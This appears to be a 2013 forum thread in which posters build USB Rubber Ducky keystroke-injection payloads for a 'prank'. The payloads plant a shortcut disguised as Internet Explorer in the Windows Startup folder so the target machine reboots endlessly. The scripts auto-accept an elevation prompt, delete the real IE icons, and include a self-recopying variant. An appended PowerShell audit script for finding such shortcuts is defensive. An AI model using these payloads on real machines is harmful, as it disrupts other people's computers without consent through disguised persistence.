Forgiven Posted November 23, 2013 (edited)

There's a pretty funny prank that many of you may already know about, that would be cool to turn into a USB Rubber Ducky prank attack. The concept is based upon creating an infinite boot loop in the target Windows system. The physical access method for creating the attack without a ducky is described in this YouTube video.

Essentially the command sequence:

    shutdown -r -t 10 -c "Your Message Here"

is created as a shortcut and saved into the startup folder so that when the victim turns off and then restarts their machine, it goes through an annoying reboot loop. It was hidden in the video as a shortcut named Internet Explorer and having the icon to match....clever.

The prank is harmless since simply holding down the SHIFT key can cease implementation of startup folder actions to allow the victim to clear the shortcut script from their STARTUP folder.

Being able to use the power of the Mighty Rubber Ducky to quickly automate the prank on a target would be cool. Having the Duck do the prank via Powershell would be nice.

That's the concept...I'm off to make a stab at my first ducky payload. If you beat me to it, please share your results.

Edited November 23, 2013 by Forgiven

Forgiven (Author) Posted November 23, 2013

MODS - DELETE THIS.....I just saw a payload exists for shutdown. Thanks.

overwraith Posted November 23, 2013 (edited)

Here is what I knocked out in about 5 min. Delete post if you must.

    REM *** Remove all internet explorer icons from the desktop. ***
    REM *** Navigate to the desktop. ***
    GUI D
    REM *** Select the menu button for a context menu. ***
    MENU
    REM *** Select the 'New' menu option.
    STRING w
    REM *** Select the shortcut option. ***
    STRING s
    REM *** Now the magic shutdown string. ***
    STRING shutdown -r -t 10 -c "You have been owned!"
    REM *** Select next button. ***
    ALT N
    REM *** Type in the shortcut name. ***
    STRING Internet Explorer
    REM *** Finish creating the shortcut. ***
    ALT F
    REM *** Select the shutdown executable from the desktop by typing its name. ***
    GUI D
    STRING Internet Explorer
    REM *** Pull up a context menu on the rogue shortcut. ***
    MENU
    REM *** Select 'properties' from the context menu. ***
    STRING r
    REM *** Select change icons button. ***
    ALT C
    REM *** Say ok to the popup box. ***
    ENTER
    REM *** You have to manually set the icon from here. ***

If you need something that will set the icon without user interaction, you could hijack the Internet Explorer icon that is already put on the desktop.

Edited November 23, 2013 by overwraith

overwraith Posted November 23, 2013

Got another script, but it is not working correctly. Need to add some delays.

    REM Author: overwraith based on 'Angry ginger kid hack'
    REM Name: InfiniteBoot.txt
    REM Purpose: A prank that makes a computer infinitely restart.
    REM Encoder V2.4+
    REM *** Initial Delay ***
    DELAY 2000
    REM *** Remove all internet explorer icons from the desktop. ***
    REM *** Bypass UAC ***
    REM Using the run command for a broader OS base.
    GUI r
    DELAY 250
    STRING powershell Start-Process cmd.exe -Verb runAs
    ENTER
    DELAY 1500
    ALT y
    DELAY 500
    ENTER
    REM *** Navigate to the desktop. ***
    STRING cd cd %homepath%\Desktop
    ENTER
    REM *** Remove the icons. ***
    STRING erase /Q "Internet Explorer*.lnk"
    ENTER
    REM *** Exit the command prompt. ***
    STRING EXIT
    ENTER
    REM *** Navigate to the desktop. ***
    GUI D
    REM *** Select the menu button for a context menu. ***
    MENU
    REM *** Select the 'New' menu option.
    STRING w
    REM *** Select the shortcut option. ***
    STRING s
    REM *** Now the magic shutdown string. ***
    STRING shutdown -r -t 10 -c "You have been owned!"
    REM *** Select next button. ***
    ALT N
    REM *** Type in the shortcut name. ***
    STRING Internet Explorer
    REM *** Finish creating the shortcut. ***
    ALT F
    REM *** Copy the shortcut file to the startup folder. ***
    REM *** Bypass UAC ***
    REM Using the run command for a broader OS base.
    GUI r
    DELAY 250
    STRING powershell Start-Process cmd.exe -Verb runAs
    ENTER
    DELAY 1500
    ALT y
    DELAY 500
    ENTER
    REM *** Navigate to the desktop. ***
    STRING cd cd %homepath%\Desktop
    ENTER
    REM *** Copy the link on the desktop to the startup folder. ***
    STRING copy /Y /L Internet Explorer*.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
    ENTER
    REM *** Exit the command prompt. ***
    STRING EXIT
    ENTER
    REM *** Saving the manual link icon selection until the end of the script.
    REM *** Select the shutdown executable from the desktop by typing its name. ***
    GUI D
    STRING Internet Explorer
    REM *** Pull up a context menu on the rogue shortcut. ***
    MENU
    REM *** Select 'properties' from the context menu. ***
    STRING r
    REM *** Select change icons button. ***
    ALT C
    REM *** Say ok to the popup box. ***
    ENTER
    REM *** You have to manually set the icon from here. ***

overwraith Posted November 24, 2013 (edited)

Ok, this script appears to work. May have to tweak the delays depending on the processing power of your system. If you do find yourself in a situation where you need to tweak the delays, break it up into procedures, and execute them one at a time. The first command window is procedure 1, making the shortcut is procedure 2, the second command window is procedure 3, and selecting the icon is procedure 4.

    REM Author: overwraith based on 'Angry ginger kid hack'
    REM Name: InfiniteBoot.txt
    REM Purpose: A prank that makes a computer infinitely restart.
    REM Encoder V2.4+
    DEFAULT_DELAY 50
    REM *** Initial Delay ***
    DELAY 2000
    GUI D
    REM *** Remove all internet explorer icons from the desktop. ***
    REM *** Bypass UAC ***
    REM Using the run command for a broader OS base.
    GUI r
    DELAY 250
    STRING powershell Start-Process cmd.exe -Verb runAs
    ENTER
    DELAY 1500
    ALT y
    DELAY 500
    ENTER
    REM *** Navigate to the desktop. ***
    STRING cd %homepath%\Desktop
    ENTER
    REM *** Remove the icons. ***
    STRING erase /Q "Internet Explorer*.lnk"
    ENTER
    DELAY 500
    REM *** Exit the command prompt. ***
    STRING EXIT
    ENTER
    DELAY 750
    REM *** Navigate to the desktop. ***
    GUI D
    DELAY 750
    REM *** Select the menu button for a context menu. ***
    MENU
    REM *** Select the 'New' menu option.
    STRING w
    REM *** Select the shortcut option. ***
    STRING s
    DELAY 2000
    REM *** Now the magic shutdown string. ***
    STRING shutdown -r -t 10 -c "You have been owned!"
    REM *** Select next button. ***
    ALT N
    DELAY 1000
    REM *** Type in the shortcut name. ***
    STRING Internet Explorer
    DELAY 750
    REM *** Finish creating the shortcut. ***
    ALT F
    DELAY 1000
    REM *** Copy the shortcut file to the startup folder. ***
    REM *** Bypass UAC ***
    REM Using the run command for a broader OS base.
    GUI r
    DELAY 250
    STRING powershell Start-Process cmd.exe -Verb runAs
    ENTER
    DELAY 1500
    ALT y
    DELAY 500
    ENTER
    REM *** Navigate to the desktop. ***
    STRING cd %homepath%\Desktop
    ENTER
    DELAY 250
    REM *** Copy the link on the desktop to the startup folder. ***
    STRING xcopy /Y "Internet Explorer*.lnk" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
    ENTER
    DELAY 750
    REM *** Exit the command prompt. ***
    STRING EXIT
    ENTER
    DELAY 1000
    REM *** Saving the manual link icon selection until the end of the script.
    REM *** Select the shutdown executable from the desktop by typing its name. ***
    GUI D
    STRING Internet Explorer
    DELAY 250
    REM *** Pull up a context menu on the rogue shortcut. ***
    MENU
    DELAY 250
    REM *** Select 'properties' from the context menu. ***
    STRING R
    DELAY 250
    REM *** Select change icons button. ***
    ALT C
    REM *** Say ok to the popup box. ***
    ENTER
    REM *** You have to manually set the icon from here. ***

If you do shoot yourself in the foot with this script, boot into safe mode, and delete the file in the startup folder.

Edited November 24, 2013 by overwraith

overwraith Posted November 24, 2013

And since the shutdown command is just batch, the following should be able to perpetuate the problem even after the shortcut is deleted from the start up folder.

    xcopy /Y "Internet Explorer*.lnk" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" & shutdown -r -t 10 -c "You have been owned!"

Have not tried it yet, but I have no reason to think it shouldn't work. So every time the user clicks on the shortcut it should copy to the startup folder.
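
The posts above say recovery means deleting the shortcut from the Startup folder. As an added example (not from any poster in this thread), this PowerShell audit lists Startup-folder shortcuts that launch shutdown or whose Internet Explorer name does not match their target; the two match rules are assumptions drawn from the payloads shown here.

```powershell
# Added example: audit Startup folders for shortcuts like the one in this thread.
# Read-only: it reports findings and deletes nothing.

# Per-user and all-users Startup folders (the thread uses the ProgramData one).
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),
    [Environment]::GetFolderPath('CommonStartup')
) | Where-Object { $_ -and (Test-Path -LiteralPath $_) }

# WScript.Shell can open an existing .lnk and expose its target and arguments.
$shell = New-Object -ComObject WScript.Shell

$findings = foreach ($dir in $startupDirs) {
    Get-ChildItem -LiteralPath $dir -Filter *.lnk -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $lnk        = $shell.CreateShortcut($_.FullName)
            $targetName = [IO.Path]::GetFileName($lnk.TargetPath)
            $reasons    = @()

            # Rule 1 (assumption): shutdown as target, or named in the arguments
            # (covers cmd.exe wrappers and chained commands).
            if ($targetName -ieq 'shutdown.exe' -or
                $lnk.Arguments -match '\bshutdown(\.exe)?\b') {
                $reasons += 'runs shutdown at logon'
            }

            # Rule 2 (assumption): shortcut named after Internet Explorer
            # that does not point at iexplore.exe.
            if ($_.BaseName -like 'Internet Explorer*' -and
                $targetName -ine 'iexplore.exe') {
                $reasons += 'name does not match target'
            }

            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    Shortcut  = $_.FullName
                    Target    = $lnk.TargetPath
                    Arguments = $lnk.Arguments
                    Created   = $_.CreationTime
                    Reason    = $reasons -join '; '
                }
            }
        }
}

$findings | Format-List
```

Run it from safe mode or after holding SHIFT at logon, as the posts describe, so the shortcut does not fire first; the same two rules can also be applied to the Desktop to find the copy left there.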